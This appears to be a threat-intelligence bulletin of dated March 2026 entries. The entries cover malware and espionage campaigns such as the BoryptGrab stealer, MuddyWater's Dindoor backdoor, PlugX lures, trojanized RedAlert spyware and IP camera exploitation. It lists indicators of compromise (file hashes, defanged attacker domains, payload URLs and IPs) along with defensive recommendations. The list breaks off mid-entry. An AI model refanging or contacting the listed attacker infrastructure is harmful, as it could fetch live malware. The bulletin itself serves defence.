Campaign Scope: Malware campaign distributing the BoryptGrab information stealer through fake GitHub repositories and deceptive download portals offering free software tools, cheats, or utilities. Victims are redirected to malicious pages that deliver ZIP archives containing the payload. Execution triggers a multi-stage infection chain using VBS downloaders, DLL side-loading, and encrypted launcher payloads to deploy BoryptGrab and additional malware. The stealer collects browser credentials, cryptocurrency wallet data, system information, files, screenshots, Telegram data, and Discord tokens. In some cases, TunnesshClient establishes a reverse SSH tunnel for persistence and proxy access, while additional loaders may deploy Vidar variants and other components.
Malware/Tools: BoryptGrab, Vidar, TunnesshClient, HeaconLoad
Targeted Country: N/A
Threat Actor: Unknown
Sector: Multi-sector / Consumer endpoints
MITRE ATT&CK Techniques: T1189 – Drive-by Download; T1566.002 – Phishing Link; T1574.002 – DLL Side-Loading; T1059.005 – VBS Script Execution; T1059.001 – PowerShell Execution; T1053.005 – Scheduled Task Persistence; T1547.001 – Startup Persistence; T1027 – Obfuscated Malware; T1105 – Payload Download; T1041 – Data Exfiltration
Threat Severity: High
Recommendation: Avoid downloading tools from unknown or unofficial repositories; verify the authenticity of developers before downloading files; monitor and block suspicious ZIP downloads; restrict DLL side-loading through application control; monitor scheduled task creation and persistence activity; inspect outbound traffic for suspicious downloads or exfiltration; deploy endpoint protection capable of detecting infostealers; keep systems and browsers updated; educate users about risks of cracked software and unofficial tools.

Campaign: Dindoor Backdoor Deployment – State-Linked Network Intrusion / Persistence
IoC: No specific IoCs publicly reported in this advisory.
Campaign Scope: Threat actors associated with the MuddyWater (Seedworm) group have been observed establishing persistent access within enterprise networks across multiple sectors. The campaign involves long-term network infiltration intended to maintain covert access for potential future disruption, intelligence collection, or data exfiltration. The activity represents a shift from traditional espionage operations toward maintaining embedded access within critical infrastructure environments, allowing attackers to blend with legitimate network activity and launch operations at a later stage.
Malware/Tools: Dindoor Backdoor
Targeted Country: United States, Israel
Threat Actor: MuddyWater (Seedworm)
Sector: Finance, IT, Government, Transportation
MITRE ATT&CK Techniques: T1547.001 – Persistence via Startup Mechanisms; T1078 – Valid Account Abuse; T1133 – External Remote Access; T1059.001 – PowerShell Execution
Threat Severity: High
Recommendation: Implement strong network segmentation to limit lateral movement; deploy intrusion detection and prevention systems; audit privileged accounts and access permissions regularly; enable enhanced logging and monitoring to detect anomalous activity; conduct proactive threat hunting for persistence mechanisms; implement zero trust architectures to continuously verify user and device access.

Campaign: Strategic Cyber Conflict Analysis – Cyber Warfare Escalation
IoC: No technical IoCs reported.
Campaign Scope: Analysis discussing the growing prominence of cyber operations as a central component of modern geopolitical conflict. The report highlights how cyber capabilities are increasingly being used as primary instruments of state conflict, shifting from covert intelligence operations toward overt cyber warfare activities. The discussion reflects the evolving role of cyber operations in strategic military engagements and their potential to replace or complement traditional warfare methods.
Malware/Tools: N/A
Targeted Country: Iran
Threat Actor: N/A
Sector: Government, IT
MITRE ATT&CK Techniques: N/A
Threat Severity: Medium
Recommendation: Strengthen cyber resilience through proactive threat intelligence monitoring, vulnerability management, and incident response preparedness; implement continuous monitoring and threat hunting to detect emerging cyber threats; promote information sharing and cooperation to address evolving cyber warfare risks.

Campaign: Camaro Dragon Campaign – Cyber Espionage / Malware Delivery
IoC: 4d8027424b5bcd167ab70c8320ce3c5df72a9ecca01246b095e4af498f77725d fff7864019b651bea2448228d6557d995edc929276bb9d8cb34c3c280a42684e fa3a1153018ac1e1a35a65e445a2bad33eac582c225cf6c38d0886802481cd43 a7c56033f2264c71b0485da693e3f627b2b5ccfe3399a53cc558be77f95d9c13 c78eb1cecef5f865b6d150adcf67fa5712c5a16b94f1618c32191e61fbe69590 1ddbed0328a60bb4f725b4ef798d5d14f29c04f7ffe9a7a6940cacb557119a1c 26d10996fd2880441445539cd8a6e7fe0777f6ca3352dae6ef84d1d747aabb0c a9de383c6a1b00c9bd5a09ef87440d72ec7fc4bcd781207b3cace2f246788d4d b58ec14b0119182aef12d153280962ad76c30e3cd67533177d55481704eba705 a8acb9864e6f64323ed75e69038ca9bfe76f7b1b0d24ec7df8ac07b6dbd641a3 almersalstore[.]com
Campaign Scope: Cyber espionage campaign targeting organizations in the Middle East using conflict-themed phishing lures referencing missile strikes and attacks on Gulf oil and gas facilities. Malicious archives containing LNK files initiate a multi-stage infection chain leading to deployment of the PlugX backdoor and Cobalt Strike. Attackers leveraged DLL side-loading and widely available offensive tooling to establish access and conduct reconnaissance, demonstrating rapid adaptation to geopolitical developments to increase lure credibility.
Malware/Tools: PlugX Backdoor, Cobalt Strike
Targeted Country: Qatar
Threat Actor: Camaro Dragon (Earth Preta / Mustang Panda)
Sector: N/A
MITRE ATT&CK Techniques: T1566.001 – Phishing Attachment; T1204.002 – Malicious File Execution; T1574.002 – DLL Side-Loading; T1105 – Payload Download; T1059 – Command Execution; T1071 – Web C2 Communication
Threat Severity: High
Recommendation: Enhance threat monitoring and incident response readiness; deploy advanced email security and phishing detection; implement robust endpoint protection; educate employees on current-event themed phishing lures; conduct proactive threat hunting related to geopolitical events.

Campaign: IP Camera Reconnaissance Campaign – Cyber Espionage / Surveillance Infrastructure Targeting
IoC: Vulnerabilities exploited: CVE-2017-7921, CVE-2021-36260, CVE-2023-6895, CVE-2025-34067, CVE-2021-33044 affecting internet-exposed IP camera systems and management platforms.
Campaign Scope: Threat actors conducted reconnaissance operations by exploiting vulnerabilities in internet-connected IP cameras, primarily Hikvision and Dahua devices. The activity aims to gather intelligence and perform battle damage assessment by accessing live video feeds and surveillance infrastructure. Compromised cameras were reportedly used to observe sensitive locations and monitor the impact of military operations. The campaign reflects the increasing use of IoT surveillance devices as intelligence collection tools during geopolitical conflicts.
Malware/Tools: N/A
Targeted Country: Israel, UAE, Qatar, Bahrain, Kuwait, Lebanon, Cyprus
Threat Actor: State-linked cyber actors
Sector: Government, Science, Military
MITRE ATT&CK Techniques: T1190 – Remote Service Exploitation
Threat Severity: High
Recommendation: Remove internet exposure of IP cameras and place devices behind VPN or zero-trust access gateways; change default credentials and enforce strong authentication; regularly update firmware and patch known vulnerabilities; isolate surveillance devices on segmented networks; monitor authentication logs and outbound traffic for suspicious activity; prioritize remediation of vulnerabilities listed in the KEV catalog.

Mar 9, 2026

Campaign
IoC
Campaign Scope
Malware/ Tools
Targeted Country
Threat Actor
Sector
MITRE ATT&CK Techniques
Threat Severity
Recommendation
Seedworm Campaign – Cyber Espionage / Infrastructure Targeting
Indicators referenced include certificates issued to “Amy Cherne” and “Donald Gay” that were used in attacker tooling and infrastructure. No additional technical IoCs were publicly disclosed in this advisory.
Ongoing cyber espionage and intrusion activity attributed to the Seedworm (MuddyWater) threat group targeting critical infrastructure and enterprise organizations. The campaign involves establishing persistent access to victim environments using custom backdoors and legitimate tools for data exfiltration and command execution. Targets include financial institutions, aviation organizations, software companies, and NGOs across North America and allied regions. The activity reflects expanded operational scope during geopolitical escalation and includes additional disruption attempts by aligned groups using DDoS techniques.
Dindoor Backdoor, Fakeset, Darkcomp, Rclone
United States, Canada, Israel
Seedworm (MuddyWater / Temp Zagros / Static Kitten), Handala, DieNet
Finance, IT, Government, Energy, Healthcare, Transportation
T1566 – Phishing Initial Access; T1190 – Web Application Exploitation; T1078 – Valid Account Abuse; T1027 – Obfuscated Malware; T1560 – Data Collection & Archiving; T1041 – Data Exfiltration over C2
Critical
Enforce multi-factor authentication across all remote access and privileged accounts; monitor outbound network traffic for abnormal data transfers; deploy web application firewalls and updated detection rules; restrict unauthorized external cloud storage access; maintain immutable offline backups; implement network segmentation and least-privilege access controls; conduct proactive threat hunting and continuous monitoring for indicators of compromise.
Hacktivist Mobilization – Coordinated Cyber Activity / Disruption Campaigns
No specific IoCs publicly reported. Activity primarily coordinated through online communities and messaging platforms used by hacktivist groups to organize operations and publicize attacks.
Following recent geopolitical escalation, more than 60 hacktivist groups rapidly mobilized and began conducting cyber operations aligned with broader political objectives. These groups reportedly leveraged AI tools to enhance operational planning, target discovery, and messaging amplification. The surge in activity increases the complexity of the threat landscape by combining hacktivist operations with broader nation-state cyber activity, potentially leading to disruption campaigns, influence operations, and opportunistic attacks against organizations linked to geopolitical actors.
N/A
United States, Israel, Iran
Multiple hacktivist groups (various)
Multi-sector
T1499 – Service Disruption (DDoS); T1585 – Online Persona Creation; T1598 – Social Engineering / Influence
High
Heighten monitoring and incident response readiness; deploy strong intrusion detection and network monitoring; enforce multi-factor authentication and strong access controls; maintain up-to-date systems and security tools; conduct proactive threat hunting; prepare contingency plans for potential service disruptions or cyber incidents linked to geopolitical developments.
Information Control Event – Internet Connectivity Disruption
No technical IoCs reported.
Ongoing nationwide internet disruption affecting connectivity and digital communications. The shutdown has restricted access to online services and information for several days, impacting civilian communication, media access, and digital services. While not a cyberattack, prolonged internet outages during geopolitical tensions can influence information flow, incident reporting, and the broader cyber threat landscape.
N/A
Iran
N/A
Telecommunications / Internet Infrastructure
N/A
Medium
Maintain awareness of regional connectivity disruptions and potential information flow limitations; monitor geopolitical developments that may correlate with cyber activity; ensure alternative communication channels and contingency plans are in place for operational continuity during large-scale connectivity disruptions.
Cyber Espionage / Critical Infrastructure Targeting
No confirmed IoCs publicly disclosed.
Ongoing intrusion activity targeting critical infrastructure and high-value organizations during the current geopolitical escalation. Activity linked to the Seedworm threat cluster involves establishing persistent access within victim networks and deploying backdoors for potential intelligence collection or future disruption. Campaigns have targeted sectors such as telecommunications, defense, and infrastructure operators.
Backdoors (unspecified)
United States
Seedworm / MuddyWater / Temp Zagros / Static Kitten
Critical Infrastructure
T1598 – Phishing / Initial Contact; T1190 – Public-Facing Exploitation; T1078 – Valid Accounts / Credential Abuse
High
Strengthen network defenses across critical infrastructure environments; enforce multi-factor authentication and strong credential policies; monitor networks for unusual access patterns or backdoor activity; conduct proactive threat hunting and incident response exercises; share threat intelligence with trusted industry partners.
Cyber Espionage / Backdoor Deployment – MuddyWater Dindoor Campaign
gitempire[.]s3[.]us-east-005[.]backblazeb2[.]com elvenforest[.]s3[.]us-east-005[.]backblazeb2[.]com uppdatefile[.]com serialmenot[.]com moonzonet[.]com
A cyber espionage campaign observed since early 2026 targeting organizations in strategic sectors including aviation, financial services, banking, and software companies connected to defense and aerospace supply chains. The attackers maintained persistence within victim networks for extended periods and attempted to exfiltrate sensitive data to cloud infrastructure using legitimate tools, indicating intelligence-gathering objectives aligned with ongoing geopolitical tensions.
Dindoor backdoor; Fakeset backdoor; Rclone; Deno runtime
United States; Canada; Israel
MuddyWater / Seedworm
Finance; IT; Defense; Aerospace; Banking
T1071.001 – Web Communication; T1105 – Tool Transfer; T1059 – Command Execution; T1547 – Persistence; T1005 – Data Collection; T1041 – Data Exfiltration; T1567.002 – Cloud Exfiltration; T1219 – Remote Access
High
Monitor for abnormal execution of Deno runtime processes and unexpected Rclone activity; implement behavioral detection for persistence mechanisms and remote access tools; conduct threat hunting for MuddyWater indicators; strengthen logging and monitoring of outbound traffic to cloud storage; ensure security tooling and threat intelligence feeds are regularly updated.
RedAlert Mobile Espionage Campaign / Mobile Spyware Distribution
hxxps://www[.]shirideitch[.]com/wp-content/uploads/2022/06/RedAlert[.]apk hxxp://bit[.]ly/3Ozydsn hxxps://api[.]ra-backup[.]com/analytics/submit[.]php
A mobile espionage campaign distributing a trojanized version of the legitimate Red Alert rocket warning application via SMS phishing messages. Victims are directed to sideload a malicious APK that mimics the official emergency alert application. Once installed, the malware collects sensitive data including SMS messages, contact lists, device information, and GPS location data while maintaining the appearance of a functional alert application. The campaign primarily targets civilians during the ongoing conflict and focuses on intelligence collection through mobile device compromise.
Android spyware (trojanized RedAlert APK)
Israel
Not attributed
Government; Defense; Military; Civilian Users
T1566.002 – Phishing Link; T1476 – Malicious App Delivery; T1409 – Sensitive Data Access; T1416 – SMS Collection; T1430 – Location Tracking; T1421 – System Discovery; T1404 – Data Exfiltration; T1027 – Obfuscation
High
Only download applications from official app stores and verify the developer before installation; avoid installing APK files from SMS or unknown links; review application permissions carefully; deploy mobile threat defense solutions where possible; educate users on mobile phishing risks, especially during periods of heightened geopolitical tension.
Cyber Espionage / Infrastructure Targeting – State-Aligned Activity
37[.]1[.]213[.]152 184[.]75[.]210[.]206 162[.]0[.]230[.]185
Increased cyber activity linked to multiple state-aligned threat actors conducting reconnaissance, credential abuse, and network probing against organizations globally amid heightened geopolitical tensions. The activity appears focused on early-stage intrusion and access establishment that could enable espionage or future disruptive operations. Targeted sectors include manufacturing, transportation, telecommunications, energy, government, finance, and defense-related organizations.
Not specified
Middle East; Europe; United States
MuddyWater / APT34 / OilRig / Seedworm; APT33 / Elfin / Refined Kitten; UNC1549 / CURIUM / Tortoise Shell / Crimson Sandstorm
Telecoms; Energy; Government; Transport; Manufacturing; Finance; Defense; Aerospace
T1566.001 – Phishing Attachment; T1110 – Brute Force; T1110.003 – Password Spraying; T1078 – Valid Accounts; T1190 – Public-Facing Exploit; T1059.001 – PowerShell Execution; T1046 – Network Scanning; T1087 – Account Discovery; T1083 – File Discovery; T1021 – Remote Services
High
Implement multi-factor authentication and strong credential policies; patch public-facing systems and monitor for exploitation attempts; enhance network monitoring for scanning or credential abuse; conduct proactive threat hunting for indicators linked to Iranian APT groups; review incident response plans and strengthen threat intelligence sharing.
Mobile Exploitation Campaign / Watering-Hole Attack – Coruna iOS Exploit Kit
TO ADVISE
A mobile exploitation campaign leveraging the Coruna iOS exploit kit targeting iPhones running iOS 13–17.2.1. The campaign has been observed in watering-hole attacks on compromised Ukrainian websites and in cryptocurrency-related scam pages. The exploit kit uses malicious web pages and hidden iframe mechanisms to deliver exploit chains and connect infected devices to attacker-controlled infrastructure for surveillance or further exploitation. Infrastructure includes domains disguised as gambling, gaming, cryptocurrency, and promotional sites.
Coruna iOS Exploit Kit
Ukraine
Not attributed
Not specified
T1189 – Drive-by Compromise; T1059 – Command Execution; T1071 – Web Communication; T1090 – Proxy Use; T1573 – Encrypted Channel; T1568 – Dynamic Resolution; T1583.001 – Domain Infrastructure; T1608.001 – Malware Staging; T1204 – User Interaction
High
Ensure iOS devices are updated with the latest security patches; deploy mobile device management (MDM) or mobile threat defense solutions where possible; restrict access to suspicious or untrusted websites; educate users about watering-hole and scam-related phishing pages; monitor network traffic for connections to suspicious domains or exploit delivery infrastructure.

Mar 8, 2026

Campaign
IoC
Campaign Scope
Malware/ Tools
Targeted Country
Threat Actor
Sector
MITRE ATT&CK Techniques
Threat Severity
Recommendation
Cyber Reconnaissance / IoT Surveillance Exploitation
CVE-2017-7921; CVE-2021-36260; CVE-2023-6895; CVE-2025-34067; CVE-2021-33044
Iran-linked cyber actors conducted large-scale scanning and exploitation attempts against internet-exposed surveillance cameras across the Middle East. The campaign targeted Hikvision and Dahua IP cameras to gain unauthorized access and potentially obtain real-time video intelligence. Compromised devices could enable reconnaissance, monitoring of strategic locations, and battle damage assessment during regional military operations. Activity correlates with heightened geopolitical tensions and demonstrates the use of compromised IoT infrastructure to support physical military intelligence operations.
Hikvision IP Cameras; Dahua Surveillance Systems
Israel; Kuwait; Qatar; UAE; Bahrain; Lebanon
Iran-linked threat actors
Military; Government; Administration
T1595 – Active Scanning; T1590 – Reconnaissance; T1190 – Public-Facing Exploit; T1046 – Service Discovery; T1021 – Remote Access; T1071 – Web Communication
High
Remove direct internet exposure of surveillance devices; place cameras behind VPN or zero-trust access gateways; apply latest firmware patches; replace unsupported devices; enforce strong unique credentials; segment surveillance devices into isolated network zones; monitor logs for suspicious login attempts and abnormal outbound connections.
Opportunistic Cybercrime / Phishing & Malware Distribution – Conflict-Themed Campaigns
Payload URLs, an IP address and phishing/hosting domains (extensive IoC set reported; not reproduced here).
Multiple malware and phishing campaigns exploiting geopolitical tensions in the Middle East. Threat actors distribute malware through conflict-themed lures, fake news blogs, fraudulent donation portals, and impersonation websites targeting victims across government, finance, and digital services sectors. Attack techniques include DLL sideloading using legitimate binaries, malicious LNK execution, CHM exploitation, shellcode loading, and remote management tool hijacking to establish persistence and exfiltrate data.
LOTUSLITE; StealC
Middle East; Bahrain; Israel
Mustang Panda (suspected activity)
Government; Military; Finance; Banking; Digital Services; IT/ISP; High-Value Individuals
T1204 – User Execution; T1566 – Phishing; T1218 – Signed Binary Proxy Execution; T1071 – Web Communication; T1547 – Persistence; T1059 – Command Execution; T1105 – Tool Transfer; T1053 – Scheduled Task; T1090 – Proxy; T1083 – File Discovery; T1027 – Obfuscation
High
Minimize exposure of internet-facing applications and VPN services; inspect network traffic for malware delivery and exploit activity; enforce least-privilege access controls and strong MFA; monitor for suspicious persistence mechanisms or proxy usage; conduct security awareness training to mitigate phishing and fraud risks; perform regular threat hunting and security assessments.

Mar 6, 2026

Campaign
IoC
Campaign Scope
Malware/ Tools
Targeted Country
Threat Actor
Sector
MITRE ATT&CK Techniques
Threat Severity
Recommendation
Opportunistic Cybercrime / Phishing & Malware Distribution
Large number of newly registered domains (>8,000) using conflict-related keywords and malicious infrastructure distributing malware (full IoC list extensive).
Surge in opportunistic cyber activity exploiting geopolitical tensions in the Middle East. Observed campaigns include phishing attacks using conflict-themed lures, fake news blogs distributing malware, fraudulent websites impersonating legitimate services, donation scams, and cryptocurrency-related fraud campaigns. Some operations delivered malware via DLL sideloading while leveraging compromised or newly registered domains to host payloads and phishing infrastructure.
StealC; LOTUSLITE backdoor
Bahrain; Iran; Israel; Iraq; United States
Mustang Panda (associated activity observed)
Finance; Government; IT
T1566.001 – Phishing Attachment; T1189 – Drive-by Compromise; T1059.001 – Command Execution; T1555.003 – Credential Theft; T1195.001 – Compromised Infrastructure; T1078.004 – Valid Accounts
High
Reduce attack surface through strong access controls and least-privilege policies; enforce multi-factor authentication; inspect network traffic to detect malicious domains and payload delivery; implement threat hunting for conflict-themed phishing campaigns and malware indicators; conduct regular security awareness training and risk assessments to mitigate social-engineering threats.
Hacktivism / DDoS & Website Defacement Campaign
No specific IoCs reported.
Ongoing hacktivist cyber operations attributed to the Fatimion Cyber Team, involving Distributed Denial of Service (DDoS) attacks, website defacements, and database data exfiltration. The group has conducted sustained activity across the Middle East since 2023 and continues operations into 2026, combining disruptive cyber activity with coordinated information operations aimed at amplifying psychological and political impact.
Not specified
Not specified
Fatimion Cyber Team
Not specified
T1499 – Service Disruption (DDoS); T1491 – Website Defacement; T1041 – Data Exfiltration; T1596 – Information Operations
Medium
Implement DDoS mitigation and web application protection mechanisms; monitor web assets for defacement attempts; strengthen database access controls and logging; deploy intrusion detection and monitoring for data exfiltration; monitor online channels for coordinated influence or disinformation activity related to hacktivist campaigns.
Cyber Espionage / Backdoor Deployment – MuddyWater Dindoor Campaign
No specific IoCs reported in the advisory.
A cyber espionage campaign attributed to the MuddyWater APT group targeting banks, airports, nonprofits, and a software supplier connected to the defense and aerospace sector. The campaign deploys newly identified backdoors to establish persistent access in victim networks, enabling long-term surveillance and potential data exfiltration. Attackers leveraged legitimate tools for data transfer to cloud storage and may use the foothold for future disruptive or destructive operations amid ongoing geopolitical tensions.
Dindoor; Fakeset; Rclone; Deno runtime
United States; Israel; Saudi Arabia; Iraq; UAE; Georgia; India; Pakistan; Turkey
MuddyWater / Seedworm / TEMP.Zagros / Mango Sandstorm / TA450 / Static Kitten
Finance; IT; Energy; Government; Aerospace; Defense
T1566 – Phishing; T1105 – Tool Transfer; T1078 – Valid Accounts; T1190 – Public-Facing Exploit
High
Strengthen phishing defenses and user awareness; monitor networks for unusual use of tools such as Rclone or abnormal cloud storage access; enforce multi-factor authentication and strong credential management; patch public-facing systems; implement network segmentation and threat hunting for MuddyWater indicators.
Cyber Espionage / Spear-Phishing Malware Campaign
No public IoCs disclosed in the advisory.
A targeted phishing campaign against Iraqi government officials using lures impersonating Iraq’s Ministry of Foreign Affairs. The operation delivers previously unseen malware families designed to establish persistence and conduct espionage activities. The attack chain uses phishing emails and fake Cisco Webex meeting pages to trigger PowerShell execution and deploy multi-stage malware capable of in-memory execution and evasion.
SPLITDROP; TWINTASK; TWINTALK; GHOSTFORM
Iraq
Dust Specter (Iran-linked)
Government
T1566 – Phishing; T1204 – User Execution; T1059 – PowerShell Execution; T1105 – Tool Transfer; T1027 – Obfuscation; T1547 – Persistence
High
Strengthen email security controls and phishing detection; conduct user awareness training to identify impersonation attempts; deploy EDR solutions to detect suspicious PowerShell and in-memory execution; apply application control to block unauthorized binaries; monitor network traffic for anomalous activity and emerging indicators linked to Dust Specter campaigns.

Mar 5, 2026

Campaign
IoC
Campaign Scope
Malware/ Tools
Targeted Country
Threat Actor
Sector
MITRE ATT&CK Techniques
Threat Severity
Recommendation
Mobile Exploitation Campaign / iOS Exploit Kit Activity
Multiple exploit delivery domains, configuration servers, and C2 infrastructure associated with the Coruna exploit kit (extensive IoC set reported).
A mobile exploitation campaign leveraging the Coruna iOS exploit kit targeting Apple iPhone devices. The campaign uses malicious web infrastructure to deliver exploits through exploit chains designed to compromise vulnerable iOS devices. The exploit kit includes delivery infrastructure, implant servers, and command-and-control channels used for post-exploitation control and potential surveillance or data collection from compromised devices.
Coruna iOS Exploit Kit
Not specified
Not attributed
Not specified
T1189 – Drive-by Compromise; T1071 – Web Communication; T1059 – Command Execution
High
Ensure iOS devices are updated to the latest security patches; deploy mobile device management (MDM) or mobile threat defense solutions where possible; restrict access to suspicious websites or links; monitor mobile device behavior for abnormal network connections or exploit activity; educate users about risks of malicious links and exploit delivery pages.
Cyber Reconnaissance / IoT Surveillance Exploitation
No specific IoCs reported.
Large-scale scanning and exploitation attempts targeting internet-connected surveillance cameras across Israel and other Middle Eastern countries following recent missile strikes. Attackers search for exposed devices with weak or default credentials and attempt to exploit known vulnerabilities to gain access. Compromised cameras could provide reconnaissance capabilities, enabling monitoring of locations, infrastructure, or individuals during periods of geopolitical tension.
Internet-connected surveillance cameras (IoT devices)
Israel; Middle East
State-linked threat actors (suspected)
Not specified
T1190 – Public-Facing Exploit; T1110 – Brute Force; T1046 – Network Scanning
High
Update firmware on all internet-exposed surveillance cameras; enforce strong and unique credentials and disable default passwords; segment IoT devices from core networks; monitor network traffic for unusual connections from camera systems; deploy intrusion detection or prevention mechanisms and prioritize patching of disclosed vulnerabilities.
Data Breach / Financial Data Leak
No IoCs reported.
A data leak involving the Ariomex cryptocurrency exchange exposed a database containing information on over 11,800 users, including identities, emails, IP addresses, and cryptocurrency transaction records from 2022 to 2025. The data reportedly surfaced on dark web forums and may enable tracking of financial activity associated with Iranian users and entities. Initial analysis suggests the breach may have originated from a compromised customer support system, potentially exposing transaction patterns and incomplete or altered KYC information.
Not specified
Global users of the platform
Not attributed
Finance / Cryptocurrency
T1078 – Valid Accounts (account access abuse); T1190 – Exploit Public-Facing Application (system compromise); T1567 – Exfiltration Over Web Services (data leak)
Medium
Implement strong access controls and MFA across all financial platforms; enhance monitoring and logging to detect anomalous access to customer databases; conduct regular security assessments of customer support systems and external-facing services; deploy data loss prevention (DLP) controls to protect sensitive financial information; monitor dark web sources for potential exposure of organizational data.
Cyber Espionage / Network Intrusion
No IoCs reported.
A sustained intrusion campaign attributed to an Iranian state-linked threat actor targeted several U.S. organizations across finance, transportation, and software sectors. The attackers reportedly established persistent access within victim networks, embedding a custom implant that allows remote control and long-term intelligence collection. The activity began in early 2026 and intensified following geopolitical tensions, suggesting pre-positioning within networks for potential data exfiltration or future disruptive activity.
Custom backdoor implant
United States
MuddyWater
Finance, IT, Transportation
T1598 – Phishing; T1190 – Exploit Public-Facing Application; T1078 – Valid Accounts; T1059 – Command & Scripting
High
Enhance monitoring for unusual outbound traffic and lateral movement; enforce multi-factor authentication across all privileged accounts; regularly patch external-facing systems and services; deploy endpoint detection and response (EDR) to identify persistence mechanisms; conduct security awareness training to reduce phishing risks; implement intrusion detection/prevention systems (IDS/IPS) and proactive threat hunting for indicators linked to MuddyWater activity.
Cyber Espionage / IoT Surveillance Intrusion
No IoCs reported.
Reports indicate a cyber-enabled intelligence operation in which traffic camera infrastructure in Iran was compromised to enable surveillance and tracking of high-value individuals. The operation allegedly leveraged access to internet-connected cameras to monitor movement patterns and gather real-time situational intelligence. The activity highlights how IoT and surveillance infrastructure can be exploited for reconnaissance and intelligence collection supporting broader geopolitical or military objectives.
Compromised traffic camera systems (IoT devices)
Iran
State-linked actor
Government, Critical Infrastructure
T1190 – Exploit Public-Facing Application; T1078 – Valid Accounts; T1189 – Drive-by Compromise
Medium
Secure internet-connected cameras and IoT devices by disabling direct internet exposure; enforce strong authentication and device-level encryption; apply firmware updates and patch known vulnerabilities; segment surveillance infrastructure from enterprise networks; monitor access logs and network traffic for anomalous device activity; conduct regular security assessments of IoT deployments in critical environments.
Operation CandleStone – Cyber Espionage / Spear-Phishing Campaign
health-beauty-skin-care[.]com abudhabspacedebate[.]com abudhbispacedebate[.]com huammings[.]com
An active cyber-espionage campaign attributed to a state-linked threat actor targeting organizations in the UAE’s aerospace, defense, government, and energy sectors. The operation uses spear-phishing emails themed around the Abu Dhabi Space Debate to deliver malicious archives containing VHD files designed to bypass Windows Mark-of-the-Web protections. Once executed, the attack chain leverages DLL sideloading to deploy the CandleStone backdoor and supporting malware, enabling reconnaissance, credential theft from Chromium-based browsers, and encrypted command-and-control communications. Analysts assess the activity may represent early-stage intelligence collection potentially preceding more disruptive operations.
Phoenix v4 RAT; Chromium credential stealer; FakeUpdate loader
United Arab Emirates
APT33 (Peach Sandstorm / Elfin / Magnallium / Refined Kitten)
Government, Aerospace, Defense, Energy
T1566.001 – Spear-phishing attachment; T1553.005 – Mark-of-the-Web bypass; T1574.002 – DLL sideloading; T1071.001 – Web-based C2
High
Block identified campaign domains; restrict mounting of VHD/ISO disk images through Group Policy; monitor for abnormal execution of mounted disk content and LNK files; hunt for dxgi.dll loaded by ApplicationFrameworkHost.exe; deploy EDR detection for DLL sideloading behavior and suspicious outbound connections; strengthen phishing detection and user awareness controls.
RedAlert – Mobile Espionage / Trojanized Application Campaign
No IoCs reported.
A mobile espionage campaign exploiting the conflict by distributing a trojanized version of the legitimate Rocket Alert application used for missile warning notifications. The malicious application targets civilians by masquerading as the official alert app while covertly collecting sensitive personal data, device information, and geolocation data. The campaign leverages heightened public reliance on emergency warning systems during conflict to trick users into installing the malicious application, enabling surveillance and intelligence collection.
Trojanized Rocket Alert Android application (mobile spyware)
Israel, Iran
Not attributed
Government, Civilian
T1588.002 – Malicious Tool Acquisition; T1189 – Drive-by / Malicious App Distribution; T1057 – Mobile Device Monitoring
High
Only install mobile applications from official app stores and verify developer authenticity; review and restrict excessive application permissions; deploy Mobile Threat Defense (MTD) solutions to detect malicious apps; educate users about risks of installing apps from external sources; verify emergency alerts and applications through official government channels.
Ransomware Activity / Data Leak Operations
No IoCs reported
Threat monitoring in early March 2026 observed continued ransomware activity and dark web–related operations. The Morpheus ransomware group reportedly targeted a manufacturing organization, while another ransomware actor resumed activity by re-publishing previously stolen victim data on leak sites to increase extortion pressure. Additionally, multiple hacktivist-style cyber activities were observed targeting organizations in regions affected by the ongoing conflict. These activities indicate a combination of financially motivated ransomware operations and politically themed cyber disruptions.
Morpheus ransomware
South Korea; Middle East region
Not attributed
Manufacturing
T1486 – Data Encrypted for Impact; T1567 – Exfiltration Over Web Service; T1499 – Endpoint Denial of Service
Medium
Maintain secure and regularly tested offline backups; enforce multi-factor authentication across critical systems; apply timely patching to reduce ransomware exposure; monitor networks for indicators of data exfiltration and unusual traffic patterns; strengthen logging, intrusion detection, and threat hunting capabilities; monitor dark web sources for potential exposure of organizational data.
Cyber Espionage Campaign / Spear-Phishing Intrusion
MD5: b8254efd859f5420f1ce4060e4796c08
SHA-1: 8621be9e1aa730d1ac8eb06fa8f66d9da70ff293
SHA-256: 903f7869a94d88d43b9140bb656f7bb86ef725efc78ef2ff9d12fd7c7c2aca74
MD5: 78275f3fc7e209b85bff6a6f99acc68a
SHA-1: fc08f8403849c6233978a363f4cdc58cd7041823
SHA-256: 6bb0d45799076b3f2d7f602b978a0779868fc72a1188374f6919fbbfba23efce
MD5: d5ddf40ba2506c57d3087d032d733e08
SHA-1: 682c043443cb81b6c2fde8c5df43333f5d1fec53
SHA-256: 797325b3c8a9356dcace75d93cb5cfb7847d2049c66772d4cc2cee821618cb96
MD5: 8f44262afaa171b78fc9be20a0fb0071
SHA-1: 1debc4c512ded889464e386739d5d2f61b87ff13
SHA-256: 293ee1fe8d36aa79cf1f64f5ddef402bc6939d229c6fca955c7b796119564779
MD5: 19ab3fd2800f62a47bf13a4cc4e4c124
SHA-1: c79c261457def606c3393dde77c82832a5c0ded3
SHA-256: ad26cd72a83b884a8bc5aaa87309683953e151ebb3fde42eda7bf9a4406e530d
MD5: 63702bd6422ec2d5678d4487146ea434
SHA-1: c7dff3a0675f330feb9a7c469f8340369451d122
SHA-256: f3f2dc31f70a105db161a5e7b463b2215d3cbd64ac0146fd68e39da1c279f7ef
MD5: aa887d32eb9467abba263920e55d6abe
SHA-1: ad97e1bba1d040a237727afdb2787d6867d72b74
SHA-256: 6af71297ce7681e64d9a4c5449a7326f17f3f107cb7940ec5e0840390c457a47
MD5: b19add5ccaa17a1308993e6f3f786b06
SHA-1: 51a746c85bd486f223130173b7e674379a51b694
SHA-256: 69294ad90aeb7f05e501e7191c95beb14e23da5587dd75557c867e2944a57fdc
MD5: 7f17fa22feaced1a16d4d39c545cdb16
SHA-1: 369b56a89b2fce2cbdc36f5a23bdec6067242911
SHA-256: fa51aff99d86a9f1f65aa0ebbf6ca40411d343cea59370851ab328b97e2164bb
MD5: 70a9b537b9b7e1b410576d798e6c5043
SHA-1: cb1760c90fb6c399e0125c7aa793efe37c4ce533
SHA-256: a27d53608ab05b5c7cb86bcf4a273435238beeb7e7efd7845375b2aa765f51e2
MD5: a7561eb023bb2c4025defcfe758d8ac2
SHA-1: df04e36c106691f9fe88e5798e4ae86438bd4f1d
SHA-256: eb5b7275c41de8e98d72696eeac9cba3719f334f8e7974e6b8760ece820b1d0c
MD5: 809139c237c4062baecab43570060d67
